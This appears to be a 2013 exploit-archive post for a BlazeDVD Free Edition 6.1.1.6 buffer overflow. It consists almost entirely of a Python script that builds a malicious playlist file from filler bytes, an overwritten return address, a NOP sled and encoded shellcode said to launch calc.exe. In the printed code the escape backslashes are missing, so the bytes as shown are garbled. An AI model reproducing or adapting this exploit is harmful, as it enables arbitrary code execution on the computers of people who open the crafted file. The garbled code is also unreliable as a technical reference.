Home / exploits BlazeDVD Free Edition 6.1.1.6 Buffer Overflow
Posted on 28 March 2013
#!/usr/bin/python # Exploit Title:BlazeDVD Free Edition 6.1.1.6 Buffer Overflow # Date: 27-03-2013 # Exploit Author: metacom # RST # Vendor Homepage: http://www.blazevideo.com/dvd-player/ # Download version 6.1.0.6: www.blazevideo.com/download.php?product=BlazeDVD # Version: BlazeDVD Free Edition 6.1.1.6 # Tested on: Windows 7 German f=open("video.plf","w") print "Creating expoit." head="#EXTM3U " head+="#EXTINF:153,Artist - song " buffer= "x41" * 260 # 260 608 eip= "xebx8bx65x61" #61658beb nop= "x90" * 20 #CMD=calc.exe bad #x00x0ax1a shell= ("xbfx92xcexe9xc9xdaxd0xd9x74x24xf4x58x33xc9xb1" "x33x31x78x12x83xe8xfcx03xeaxc0x0bx3cxf6x35x42" "xbfx06xc6x35x49xe3xf7x67x2dx60xa5xb7x25x24x46" "x33x6bxdcxddx31xa4xd3x56xffx92xdax67x31x1bxb0" "xa4x53xe7xcaxf8xb3xd6x05x0dxb5x1fx7bxfexe7xc8" "xf0xadx17x7cx44x6ex19x52xc3xcex61xd7x13xbaxdb" "xd6x43x13x57x90x7bx1fx3fx01x7axccx23x7dx35x79" "x97xf5xc4xabxe9xf6xf7x93xa6xc8x38x1exb6x0dxfe" "xc1xcdx65xfdx7cxd6xbdx7cx5bx53x20x26x28xc3x80" "xd7xfdx92x43xdbx4axd0x0cxffx4dx35x27xfbxc6xb8" "xe8x8ax9dx9ex2cxd7x46xbex75xbdx29xbfx66x19x95" "x65xecx8bxc2x1cxafxc1x15xacxd5xacx16xaexd5x9e" "x7ex9fx5ex71xf8x20xb5x36xf6x6ax94x1ex9fx32x4c" "x23xc2xc4xbax67xfbx46x4fx17xf8x57x3ax12x44xd0" "xd6x6exd5xb5xd8xddxd6x9fxbax80x44x43x13x27xed" "xe6x6b") try: f.write(head+buffer+eip+nop+shell) f.close() print "File created" except: print "File cannot be created"
